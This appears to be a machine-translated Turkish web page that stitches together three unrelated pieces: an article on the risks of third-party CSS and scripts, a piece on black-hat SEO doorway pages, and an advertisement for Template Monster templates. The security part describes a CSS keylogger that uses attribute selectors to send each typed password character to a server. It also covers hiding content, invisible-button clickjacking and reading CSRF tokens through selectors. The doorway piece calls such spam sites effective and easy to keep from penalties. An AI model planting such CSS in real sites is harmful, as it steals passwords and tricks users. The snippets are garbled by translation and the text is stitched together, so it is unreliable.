ana /
programlar/ İnternette makalelerin dağıtımı. Seçenekler ve özellikleri
İnternette makale dağıtımı. Seçenekler ve özellikleri
Üçüncü taraf CSS, JavaScript ve üçüncü taraf sunuculardaki diğer kaynakları kullanarak sitenize nasıl zarar vereceğiniz aşağıda açıklanmıştır.
Şubat ayının sonunda, ağda kısmen CSS kullanan bir keylogger ortaya çıktı. Bunu kullanan saldırı basittir: belirli bir türe (örneğin şifre) sahip bir alana girilen her karakter için, bir arka plan görüntüsü talep ettiği iddia edilen bir üçüncü taraf sunucusuna bir istek oluşturulur:
girdi (arka plan resmi: url ("http: // localhost: 3000 / a"));)
arka plan - resim: url ("http: // localhost: 3000 / a");
İsteklerin sırası sunucuya kaydedilebilir ve girilen şifre kolayca hesaplanabilir.
Sorunu tartışma sürecinde, bazıları tarayıcı üreticilerine sorunu çözmelerini önerdi. Birisi, sorunun yalnızca React benzeri çerçevelere dayalı siteler için geçerli olduğunu fark etti ve suçu onlara kaydırdı.
Üçüncü taraf resimleri
<
img
src
=
"https://example.com/kitten.jpg">
Bu tür bir görseli sitenize eklerseniz, example.com'a bağımlı olursunuz. seni ayarlayabilirler Farklı yollarörneğin, bir resmi silin - resim yerine 404 alırsınız. Veya bir kedinin görüntüsünü daha az hoş bir şeyle değiştirebilirler.
Kullanıcılarınızı, görüntünün üçüncü taraf bir kaynaktan eklendiği ve bununla hiçbir ilginizin olmadığı konusunda uyarabilirsiniz. Böylece kendinizi beladan biraz koruyacaksınız. Ama elbette basit bir resim eklediğinizde şifrelere erişim sağlamıyorsunuz.
Üçüncü taraf komut dosyaları
Bu örnek, example.com için çok daha ilginç, çünkü sitelerinden bir komut dosyası ekleyerek onlara kendi siteleri üzerinde çok daha fazla kontrol sağlıyorsunuz. Bu durumda example.com şunları yapabilir:
Sayfanın içeriğini okuyun / değiştirin.
Her kullanıcı işlemini izleyin.
Hesaplanması zor olan bir kod çalıştırın (örneğin, bir kripto madenci).
Çerez talep edin.
Yerel depolamayı okuyun / değiştirin.
Başka bir deyişle, artık example.com çok şey yapabilir.
Yerel depolama ile etkileşim kurmak gelecekte daha da fazla zorluk getiriyor. Komut dosyası sayfadan kaldırıldıktan sonra bile üçüncü taraf bir kaynağın sitenize erişimi olacaktır. Sitenize üçüncü taraf bir komut dosyası eklerseniz, kaynağa ve güvenliğine kesinlikle güvenmelisiniz.
Hâlâ kötü bir komut dosyasıyla karşılaşırsanız, Clear-Site-Data başlığını kullanmayı deneyin.
Üçüncü taraf CSS'si
<
link
rel
=
"stylesheet"
href
=
"https://example.com/style.css">
Site üzerindeki etkisi için üçüncü taraf CSS kodu, resim ve komut dosyası arasında yer almaktadır. Başka birinin CSS'si şunları yapabilir:
CSS, yerel depolama ile etkileşime giremeyecek ve kripto madenci onu sayfaya gömmeyecek, ancak kaynak sahibine çok zarar verebilir.
tuş kaydedici
Makalenin başından itibaren CSS'yi biraz değiştirmek:
giriş (arka plan resmi: url ("/ şifre? a");)
input [type = "password"] [değer $ = "a"] (
arka plan - resim: url ("/ şifre? a");
Bu kod, bir resim talebi kisvesi altında işleyiciye girilen "a" karakteri hakkında veri gönderir. Kodu her sembol için tekrarlayın ve zaten bir CSS keylogger'ınız var.
Varsayılan olarak, tarayıcılar, değer özniteliğinde kullanıcı tarafından girilen karakterleri saklamaz, bu nedenle bu hile, gibi değerleri senkronize eden bir şey kullanırken işe yarar.
Elbette bu sorun React ve benzeri frameworkler tarafında çözülebilir. Ama sonra sadece özel durum, ve sorunların geri kalanı kalacaktır.
Kaybolan içerik
body (ekran: yok;) html :: after (içerik: "HTTP Sunucusu Sunucusu Hatası";)
vücut (
görüntü yok;
html :: sonra (
içerik: "HTTP Sunucusu Hatası";
Bu, elbette, çok tuhaf bir örnek, ama yine de çalışan bir örnek. Kullanıcılarınızın siteyi ziyaret ettiklerinde her zamanki gibi göreceklerini hayal edin. ana sayfa anlaşılmaz hata Aynı şekilde, üçüncü taraf kodu, örneğin "satın al" düğmesini kaldırabilir veya başka bir sıkıntı yaratabilir.
içerik ekleme
Fiyat-değer :: önce (içerik: "1";)
Fiyat - değer :: önce (
içerik: "1";
Ve aynen böyle, fiyatlarınız fırladı.
İçerik taşıma
Her şeyi sil düğmesi (opaklık: 0; konum: mutlak; üst: 500 piksel; sol: 300 piksel;)
Sil - her şey - düğme (
opaklık: 0;
pozisyon: mutlak;
üst: 500 piksel;
sol: 300 piksel;
Korkunç bir şey yapan ve kullanıcının tıklamayacağı bir düğme alın, şeffaf yapın ve kullanıcının tıklayacağı yere yerleştirin.
Elbette, düğme gerçekten önemli bir şey yaparsa, kullanıcı önce bir uyarı iletişim kutusu görecektir. Ama bu da sorun değil: sadece daha fazla CSS'ye ihtiyacınız var. Örneğin, "Aman Tanrım, hayır!" düğmesinin içeriğini "Elbette eminim" olarak değiştirebilirsiniz.
Tarayıcı üreticilerinin keylogger hilesini değiştirdiğini hayal edin. Saldırganlar, önemli bir şifre alanının üstüne fazladan bir metin alanı yerleştirir ve işe geri dönerler.
Nitelikleri Okuma
Parolalar mutlaka değer ve diğer özelliklerde saklanmaz: bir saldırgan başka ilginç bir şey bulabilir.
<
input
type
=
"hidden"
name
=
"csrf"
value
=
"1687594325"
>
<
div
class
=
"banner
users
-
birthday
-
today
»>
<
/
div
>
Tüm bu veriler CSS seçicileri tarafından toplanabilir ve olması gerektiği yere gönderilebilir.
Kapı (syn.door, İngiliz kapısından veya ön kapıdan)
— siyah SEO aracı, kullanıcıları başka bir internet kaynağına yönlendirmek için tasarlanmış bir web sitesi.
Site, genellikle sayfasını görüntüleme fırsatı bile olmayan kullanıcı açısından işe yaramaz. Giriş siteleri genellikle ücretsiz barındırmada kayıtlıdır.
Metin içeriği genellikle anlamsızdır ve şu ifadeleri içeren cümle parçalarından oluşur. büyük miktaranahtar kelimeler... Bu tür siteler sadece interneti tıkar. Dora'nın asıl amacı indekslenmek ve arama sonuçlarında yer almaktır.
kapı tipolojisi
Algoritmaların ortaya çıkmasıyla, kaynakların alaka düzeyi, yetkin içerik ve iyi organize edilmiş temellere dayalı olarak hesaplandı. anlamsal çekirdek... Ancak, kapıların kaçınılmaz görünümüne yol açan malzemenin okunabilirliğini korurken, kesinlikle tüm istekler için kaynak sayfaları düzenlemek mümkün değildi. Bağlantı sıralamasının ortaya çıkmasından sonra, böyle bir tanıtım yöntemi kendi içinde ortaya çıktı. modern biçim, yani kullanıcıları başka bir siteye yönlendirmek ve bağlantı ağırlığını yayınlamak olarak.
Kapılar arasında aşağıdaki tipler şartlı olarak ayırt edilebilir:
Beyaz kapılar, telif hakkı içeriği ve yüksek kaliteli grafikler içerebilen yasalara uygun sitelerdir. Kullanıcı böyle bir siteye girdikten sonra, tanıtılan kaynağa giden bağlantıları takip edebilir.
Gri kapılar, asıl görevi bağlantıyı aktarmak olan sitelerdir, bu nedenle bu tür sitelerdeki metin malzemeleri benzersiz ve anlaşılırdır ve metin ortamına bağlantılar eklenir. Ana site, TCI ve PR kapılarının desteğini alarak bağlantı gücünü artırabilir.
Siyah kapılar, ana görevi arama motorları tarafından hoş karşılanmayan üçüncü taraf bir kaynağa otomatik olarak yeniden yönlendirmek veya yönlendirmek olan sitelerdir. Bu görevi gerçekleştirmek için meta etiketler veya java komut dosyaları yapılandırılır. Siyah kapılara anlamsız metinler yerleştiriliyor çünkü kullanıcının zaten onları okumaya vakti olmayacak. Ana amaç, ana siteyi arama sonuçlarında yukarılara çıkarmaktır. Kapıların oluşturulmasında, gerekli taleplerle metinlerle "gelen" sözde dorgen tarafından dayanılmaz bir katkı yapılır.
Kapılar ve SEO
Kapılar, en etkili web sitesi optimizasyon yöntemleri arasında sıralanır. Arama motorlarından ceza almaktan kaçınmak zor değil - sadece basit kurallara uymanız gerekiyor. Doraları oluşturmak uzun zaman alır ve aslında bunların optimizasyonu normal kaynakları teşvik etmekten farklı değildir.
Kapılar ve arama motorları
Kapılardan terfi için sistemler yasaklanır veya kötümser. Yandex kuralları, kullanıcıları üçüncü taraf kaynaklara yayınlayan sitelerin spam olarak sayıldığını ve dizinden kaldırıldığını söylüyor. Ancak, ana adresin alt etki alanındaki kapı aralığı dışında, yalnızca kapılar yasaklanır veya kötümserleştirilir; ana site bozulmadan kalır.
Ama aslında arama motorları Kapılar nadiren cezalandırılır, çünkü iyiye yönlendirme yapan oldukça saygın sitelerle (örneğin, microsoft.ru) kolayca karıştırılabilirler.
Beyaz ve gri kapılar spam için suçlanamaz.
Onlarla nasıl başa çıkılır?
Daha önce de belirtildiği gibi, arama motorlarının kapıları bulması zordur. Algoritmalar sürekli olarak güncelleniyor ve meta etiketler ve komut dosyaları kullanarak yeniden yönlendirme girişimlerini tespit etmeye ve bastırmaya çalışsa da, giriş sayfalarının gelişimi de ilerliyor ve web yöneticileri sürekli olarak kullanıcıları yeniden yönlendirmek için yenilikçi yöntemler ekliyor.
Herhangi bir site sahibi sahip olmak ister Güzel tasarım! Öyleyse, bir web kaynağı için hızlı ve uygun bir fiyata yüksek kaliteli bir tasarımın nasıl elde edileceği sorusu ortaya çıkıyor?
Üçüncü taraf kaynakların katılımıyla web sitesi tasarımı geliştirme
Ne üçüncü taraf kaynakları? Bir web sitesi oluşturmak için kimsenin haberi olmayacak, eğer kendiniz nereden başlayacağınızı bilmiyorsanız, bir geliştiriciye ve tasarımcıya ihtiyacınız var. Bu ustaları işe çekerken, her şeyin çabucak yürümeyeceği gerçeğine hazırlıklı olmalısınız.
Her uzmanın kendi vizyonu vardır ve her biri kendi yolunda “doğru” olanı anlar. Bu yüzden fikrinizi savunmaya hazır olun. Geliştiricilerin ve tasarımcıların hizmetleri ucuz olmadığı için tüm bu tür anlaşmazlıklar ve değişiklikler çok zaman, çaba ve para gerektirir.
Yukarıdakiler göz önüne alındığında, bu şu soruyu akla getiriyor: “Neden bir web sitesi oluşturmak için üçüncü taraf kaynakları dahil ediyorsunuz?”. İşin garibi, ama bazı artılar var. İlk olarak, bu tür bir işbirliği, site için yalnızca güzel bir tasarım oluşturmanıza değil, aynı zamanda tamamen benzersiz olmanıza da olanak tanır. İkinci olarak, web kaynağınız için her zaman hayalini kurduğunuz, hatta en karmaşık ve her türlü bölüm ve çeşitli karmaşıklıktaki menülerle dolu böyle bir düzen uygulayabilirsiniz.
Şablonlarla güzel tasarımlar oluşturun
şablonlar- bu zaten bitmiş tasarım bir web sitesi oluşturmak için kullanabileceğiniz. Belirli bir CMS üzerinde çalışacak bir web sitesi oluşturmak istiyorsanız, bu platform için özel olarak tasarlanmış bir şablon seçebilirsiniz.
Şablon kullanmanın faydaları nelerdir? Yukarıdaki ekran görüntülerine baktıktan sonra, daha doğrusu şirketten teklif edilen mizanpajların fiyatı Şablon canavarı, şablonlar için fiyatlandırma politikasının çok sadık olduğunu kesinlikle söyleyebiliriz.
Az para için sadece güzel bir tasarım değil, aynı zamanda modern işlevsellik de elde edersiniz. Ayrıca tüm şablonlar özelleştirilebilir, bu nedenle mizanpaj tasarımında size uymayan bir şey olsa bile değiştirebilir veya silebilirsiniz. Sayesinde net arayüz admin panelinden, mevcut ayarları dahil etmeden kolayca anlayabilirsiniz. dışarıdan yardım, bu da zamandan ve bütçeden önemli ölçüde tasarruf sağlayacaktır.
Şablonların çoğu duyarlıdır, bu da her tür cihazda çalışabilen işlevsel bir site oluşturmayı mümkün kılar. Doğru şablonu seçerken kesinlikle dikkate alınması gereken bir diğer özellik de çok yönlülüktür!
Takım Şablon canavarıörneğin bir çevrimiçi mağaza veya blog gibi farklı yönlerdeki siteler için ve ayrıca çeşitli konulardaki kaynaklar (inşaat, mobilya mağazası vb.) için kullanılabilecek belirli bir şablon türü geliştirmiştir.
Ve son olarak, hazır mizanpajlarla çalışmanın en önemli avantajı Şablon canavarı bir tema satın alarak, ücretsiz servis 7/24 teknik destek. Bu nedenle, satın alınan temanın nasıl kurulacağı veya özelleştirileceği ile ilgili herhangi bir sorunuz varsa, uzman yardımı alabilirsiniz!
Güzel web sitesi tasarımları zaten başarının ilk adımı! Kullanıcılar bir siteyi açtıklarında önce kaynağı görsel olarak değerlendiriyor, ardından üzerinde hangi bilgilerin olduğunu görüyorlar. Bu nedenle, çok sayıda müşteriniz, okuyucunuz veya alıcınız olsun istiyorsanız, sitenizi sonsuza dek terk etmemeleri için ilk bakışta dikkatlerini çekebilmek önemlidir. Ama nasıl yapmalı? Bu doğru, kaynağınız için kullanıcıların ilgisini çekebilecek ve ilgisini çekebilecek güzel bir tasarım kullanın.
Bir web sitesinin nasıl oluşturulacağına karar verirken (sıfırdan oluşturun veya bir şablon kullanın), kaynak için en çok seçim yapmanızı sağlayacak ana görevleri belirlemek önemlidir. uygun yol... Tabii ki, özellikle neye ihtiyacınız olduğunu en iyi bildiğiniz için bir web sayfası geliştirmeye kendiniz başlayabilirsiniz! Ancak, bu durumda, belirli bir düzeyde beceri ve bilgi gerekli olacaktır.
Tüm bunlar yoksa, ancak sitenin tasarımını gerçekten kendiniz yapmak istiyorsanız, şablonları tercih edin. Şablon canavarı... Büyük becerilere gerek yoktur ve acemi bir kullanıcı için bile her şey açıktır!
İndirme şimdi başlayacak... Materyal paylaşmayı unutmayın ile sosyal ağlarda iş arkadaşları